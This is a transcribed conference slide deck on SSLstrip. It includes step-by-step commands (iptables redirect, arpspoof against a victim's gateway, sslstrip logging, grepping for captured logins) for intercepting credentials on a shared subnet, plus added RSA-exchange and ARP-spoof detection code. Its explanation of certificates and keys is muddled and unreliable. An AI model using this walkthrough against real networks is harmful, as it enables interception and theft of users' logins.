SSLstrip

Nov 18, 2014

Sandip Dey
Page 1: SSLstrip

SSLstrip

Page 2: SSLstrip

Presented by: Brian Fields "AZ_RUNE", http://arizonarune.blogspot.com/

Brought to you by: PLUG – Phoenix Linux User Group's Hackfest

Courtesy of: Lisa Kachold, http://www.obnosis.com

Page 3: SSLstrip

Covered Topics:

- What is SSLstrip?
- How does it work?
- What occurs when it is active?
- What does it mean to network security?
- Some steps to proactively defend against it.

Page 4: SSLstrip

What is SSLstrip?

Before we can understand why and how to "strip" something, we should know why and how it's implemented.

- What is SSL & TLS?
- Where did SSL/TLS come from?
- Why are SSL/TLS used?
- How can secure protocols be built upon unsecure protocols?

Page 5: SSLstrip

What is SSL & TLS?

SSL stands for Secure Sockets Layer, though the I.E.T.F. (Internet Engineering Task Force) has renamed it TLS (Transport Layer Security). TLS is documented in RFC 2246 and identifies itself in the protocol version field as SSL 3.1.

Page 6: SSLstrip

Where did SSL/TLS come from?

SSL was developed by Netscape, and is used extensively by web browsers & crawlers to provide secure connections for transferring sensitive data, such as credit card numbers and login authentication. An SSL-protected HTTP transfer uses trusted port 443 (instead of HTTP's normal port 80), and is identified with a special URL method, "https". Thus, https://mail.google.com/ would cause an SSL-enabled browser to open a secure SSL session to trusted port 443 at mail.google.com.

Page 7: SSLstrip

Where did SSL/TLS come from? "Trusted Ports?"

This is one of the first security patterns implemented on the Internet, via the "r" or remote programs. The idea is that all ports below 1024 were assigned ONLY to system processes. This means remote connections were trusted because if the port was below 1024 it was a system process and not a user/client. This affects layer 4, "Transport", of the OSI model, and the protocols involved were TCP and UDP. It should be noted that this is an old security mechanism that modern encryption, via SSH, has replaced.

Page 8: SSLstrip

Why are SSL/TLS used?

In a word: cryptography. This is the foundation for most modern security protocols. When an SSL session is established, the server begins by sending a non-encrypted public key to the client, so both parties (and any eavesdropper) can read this key. However, the client then transmits a random 46 bytes (based on PKCS) of data back to the server in a way that no one else could decode. Only the server, with its private key, can decode the information to determine the 46 original bytes. This shared secret is now used to generate a set of cipher keys (based on RC4 or ARC4) to encrypt the remainder of the session.

Page 9: SSLstrip

Why are SSL/TLS used? (cont.)

These keys were embedded in the authentication certificates (called X.509 certificates), which allowed a server to authenticate a client when it presented its certificate that had the key within its contents. Once the server verified the two certificates as matching, authentication is complete.

Wait, if all this works so well, then why are we talking about SSLstrip?
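The exchange slides 8 and 9 describe, as an added teaching example that is not part of the original deck and is not sslstrip's or any library's code: a toy RSA exchange in which the client encrypts 46 random bytes to the server's public key, the server recovers them with its private key, and both ends derive the same session key. The function names, the 512-bit toy modulus, and the SHA-256 stand-in for the TLS key derivation are this example's own assumptions; it does no PKCS#1 padding and is meant only to show which values a passive listener can see and which it cannot.

```python
"""Toy illustration of the RSA-based key exchange described on slides 8-9.

Constructed teaching code, not sslstrip's or any library's implementation.
The toy key size and the absence of PKCS#1 padding make this unsafe for
real use; it exists only to show what an eavesdropper can and cannot learn.
"""
import hashlib
import secrets

PREMASTER_LEN = 46  # the slide's "46 random bytes" chosen by the client


def _is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin primality test (probabilistic, 32 rounds)."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    """Random odd candidate with the top bit set, retried until probably prime."""
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(candidate):
            return candidate


def generate_keypair(bits: int = 512):
    """Return ((n, e), (n, d)); n must exceed 2**(8*PREMASTER_LEN) to hold the secret."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e != 0:
            break
    n = p * q
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def client_hello(public_key):
    """Client side: pick 46 random bytes and encrypt them to the server's public key.
    Returns (premaster, ciphertext); only the ciphertext goes on the wire."""
    n, e = public_key
    premaster = secrets.token_bytes(PREMASTER_LEN)
    m = int.from_bytes(premaster, "big")
    assert m < n, "modulus too small for the premaster secret"
    return premaster, pow(m, e, n)


def server_decrypt(private_key, ciphertext: int) -> bytes:
    """Server side: recover the 46 bytes with the private exponent."""
    n, d = private_key
    return pow(ciphertext, d, n).to_bytes(PREMASTER_LEN, "big")


def derive_session_key(premaster: bytes, label: bytes = b"toy session key") -> bytes:
    """Both ends turn the shared secret into cipher keys (a real stack uses the TLS PRF)."""
    return hashlib.sha256(label + premaster).digest()


def run_exchange():
    """Drive one exchange and report what each party, and the wire, ends up with."""
    public_key, private_key = generate_keypair()
    client_secret, on_the_wire = client_hello(public_key)
    server_secret = server_decrypt(private_key, on_the_wire)
    return {
        "eavesdropper_sees": (public_key, on_the_wire),  # public key + ciphertext only
        "client_premaster": client_secret,
        "server_premaster": server_secret,
        "client_key": derive_session_key(client_secret),
        "server_key": derive_session_key(server_secret),
    }


if __name__ == "__main__":
    result = run_exchange()
    print("session keys match:", result["client_key"] == result["server_key"])
```

Note that the public key travels unauthenticated in this exchange: the math hides the 46 bytes from a passive listener, but nothing here tells the client whose public key it received, which is the gap the X.509 certificates on slide 9 are meant to close.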

Page 10: SSLstrip

How can secure protocols be built upon unsecure protocols?

In a nutshell – they cannot be built upon them without leaving a way for them to be circumvented.

This is where SSLstrip comes into use, with a MITM (Man In The Middle) attack after exploiting a chosen subnet.

By the way, almost all of you have been victims of a spoofing attack. Oh yes, and they were legal attacks, 100% legal!

Page 11: SSLstrip

How does it work?

Page 12: SSLstrip

How does it work?

The picture does a decent job of explaining the flow of how SSLstrip works. In the next few slides I will explain how this works step by step, and at the end there's an embedded mp4 going over the concepts discussed in the coming slides.

Page 13: SSLstrip

What occurs when it is active?

First, we have some requirements that have to be met if we are to use SSLstrip:

- An Internet connection
- Victim has to be on the same subnet
- A Linux computer (BT4 has the following tools on a Live Disc)
  - SSLstrip: http://www.thoughtcrime.org/software/sslstrip/
  - ARPspoof
  - Ettercap (this is only necessary if you don't want to run 'cat' for sslstrip.log)

Page 14: SSLstrip

What occurs when it is active?

Second, now that we have the requirements, we have to have a victim on the same subnet. In this example we have gained access to the network and we are setting up shop to intercept SSL traffic. Access could have been through a pen test or completely open access (i.e.: wifi at a University campus, Starbucks, etc.).

Now open a terminal. Either change to root or be prepared to 'sudo' these commands.

Page 15: SSLstrip

What occurs when it is active?

    tar zxvf sslstrip-0.6.tar.gz
    cd sslstrip-0.6
    (optional) python ./setup.py install

If you have BT4, the next set of tools are already on the live disk. Otherwise use your package manager and download ettercap and dsniff (has arpspoof).

The IP address we will arpspoof in the demo video is 172.16.30.132. The Default Gateway will be 172.16.30.2, and we will be acting as the Default Gateway for this MITM (Man In The Middle) attack.

Page 16: SSLstrip

What occurs when it is active?

On to setup:

    echo "1" > /proc/sys/net/ipv4/ip_forward

Turns the spoofing system into a router.

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Tells all traffic on port 80 to head over to 8080 so we can monitor all the information and strip SSL.

Page 17: SSLstrip

What occurs when it is active?

    arpspoof -i eth0 -t 172.16.30.132 172.16.30.2

Allows our system to become any IP on the local network, by letting us send unsolicited ARP responses. Once running, the victim will see the Default Gateway as "our" MAC address.

    python ./sslstrip.py -a -l 8080

-a tells sslstrip to log all SSL and HTTP traffic.

-l 8080 tells it to listen on port 8080.

Page 18: SSLstrip

What occurs when it is active?

At this point our system is logging traffic and we can still go on the web, for example http://www.example.com/. However, if we go to Gmail and check the address bar, we will notice that what should have been https is only http. Try logging into mail with a dummy login and password. While you won't get in, it will log the info you used in the attempt.

Dummy login: pauldotcom12345
Dummy password: password12345

Page 19: SSLstrip

What occurs when it is active?

At this point we are going to check the log file to see what has come up:

    cat sslstrip.log | grep pauldotcom12345

When the log displays in the terminal you will see a bunch of different information. Keep looking and you will see the dummy login and password you used.

Page 20: SSLstrip

What does it mean to Network Security?

If you are a penetration tester, MITM attacks need to be a tactic you are aware of, both to spot and to use. Remember the legitimate use I mentioned earlier for arpspoofing?

Educate your users on the things they need to pay attention to on your network. Don't treat your users like new users, or that is all they will ever be. Be careful trying to lock them down, or you will likely find SSH tunnels leaving your network.

Page 21: SSLstrip

Some steps to proactively defend against it.

If you are a penetration tester, remember that port scanning and exploitation are not the only skills you need. Learning how to creatively exploit what you gain access to will allow you to plan better safeguards and keep unwanted traffic out.

If your users are properly educated, then they can be an extra layer of security, because they will be invested in the security of the network like you are.

Run regular checks and scans, and read your logs. Vigilance will pay off, for the lazy admin is the hacked admin.
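One of the "regular checks" this slide asks for, written against the symptom slide 17 describes (the gateway's IP suddenly resolving to another host's MAC) as an added example that is not part of the original deck and not code from sslstrip, dsniff or ettercap: a small monitor that parses Linux /proc/net/arp snapshots, compares them with a learned baseline, and alerts when the gateway's MAC changes or one MAC answers for several IPs. The gateway IP is the one used in the slides' demo; the MAC addresses and the two snapshots are constructed placeholders, and the function names are this example's own.

```python
"""Detect ARP-cache tampering of the kind slide 17 describes: the default
gateway's IP resolving to a different host's MAC. Added example, not part of
the original slides; MAC values and snapshots below are constructed."""
from dataclasses import dataclass
from typing import Dict, List

GATEWAY_IP = "172.16.30.2"  # the default gateway from the slides' demo

# Constructed /proc/net/arp snapshots: a clean baseline and a poisoned cache.
# The .200 entry has flags 0x0 (unresolved) and a placeholder MAC, which the
# parser must ignore rather than treat as a real binding.
BASELINE_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
172.16.30.2      0x1         0x2         02:00:00:aa:00:02     *        eth0
172.16.30.132    0x1         0x2         02:00:00:aa:01:32     *        eth0
172.16.30.140    0x1         0x2         02:00:00:aa:01:40     *        eth0
172.16.30.200    0x1         0x0         00:00:00:00:00:00     *        eth0
"""

POISONED_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
172.16.30.2      0x1         0x2         02:00:00:aa:01:40     *        eth0
172.16.30.132    0x1         0x2         02:00:00:aa:01:32     *        eth0
172.16.30.140    0x1         0x2         02:00:00:aa:01:40     *        eth0
"""


def parse_proc_net_arp(text: str) -> Dict[str, str]:
    """Map IP -> lower-case MAC from /proc/net/arp text, skipping the header line
    and entries whose ATF_COM flag (0x2) is clear, i.e. unresolved neighbours."""
    table: Dict[str, str] = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        ip, flags, mac = fields[0], fields[2], fields[3].lower()
        if int(flags, 16) & 0x2 == 0:
            continue
        table[ip] = mac
    return table


@dataclass
class Alert:
    kind: str
    detail: str


def check_arp_table(baseline: Dict[str, str], current: Dict[str, str],
                    gateway_ip: str) -> List[Alert]:
    """Compare a current ARP table with the learned baseline."""
    alerts: List[Alert] = []
    # 1. The gateway's MAC must match the baseline learned on a clean network.
    base_gw, cur_gw = baseline.get(gateway_ip), current.get(gateway_ip)
    if base_gw and cur_gw and base_gw != cur_gw:
        alerts.append(Alert("gateway-mac-changed", f"{gateway_ip}: {base_gw} -> {cur_gw}"))
    # 2. One MAC bound to several IPs: a host that claims the gateway's address
    #    while keeping its own shows up exactly this way.
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in current.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(Alert("duplicate-mac", f"{mac} claims {sorted(ips)}"))
    # 3. Any other known host whose MAC moved since the baseline.
    for ip, mac in current.items():
        if ip != gateway_ip and ip in baseline and baseline[ip] != mac:
            alerts.append(Alert("host-mac-changed", f"{ip}: {baseline[ip]} -> {mac}"))
    return alerts


def scan(baseline_text: str, current_text: str, gateway_ip: str = GATEWAY_IP) -> List[Alert]:
    """Parse both snapshots and return the list of alerts (empty when clean)."""
    return check_arp_table(parse_proc_net_arp(baseline_text),
                           parse_proc_net_arp(current_text), gateway_ip)


if __name__ == "__main__":
    # On a live host, replace POISONED_ARP with open("/proc/net/arp").read()
    # and keep BASELINE_ARP from a snapshot taken while the network was known good.
    for alert in scan(BASELINE_ARP, POISONED_ARP):
        print(f"[{alert.kind}] {alert.detail}")
```

Run from cron or a systemd timer, this turns the slide's "Default Gateway is our MAC address" symptom into a log line a user or admin can act on; the baseline should be refreshed whenever the gateway hardware legitimately changes, or the first alert after a router swap will be a false positive.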

Page 22: SSLstrip

Thanks to Pauldotcom.com for this demo. Below is the embedded mp4 file.

If it won't play, go to: http://www.youtube.com/watch?v=xWBeQ0cR0WY

Page 23: SSLstrip

Reference Sources / Bibliography

- Freesoft.org: http://www.freesoft.org/CIE/Topics/146.htm, http://www.freesoft.org/CIE/Topics/121.htm
- IETF – Internet Engineering Task Force: http://www.ietf.org
- Moxie Marlinspike: http://www.thoughtcrime.org/software/sslstrip/
- Wikipedia: http://en.wikipedia.org/wiki/ARP_spoofing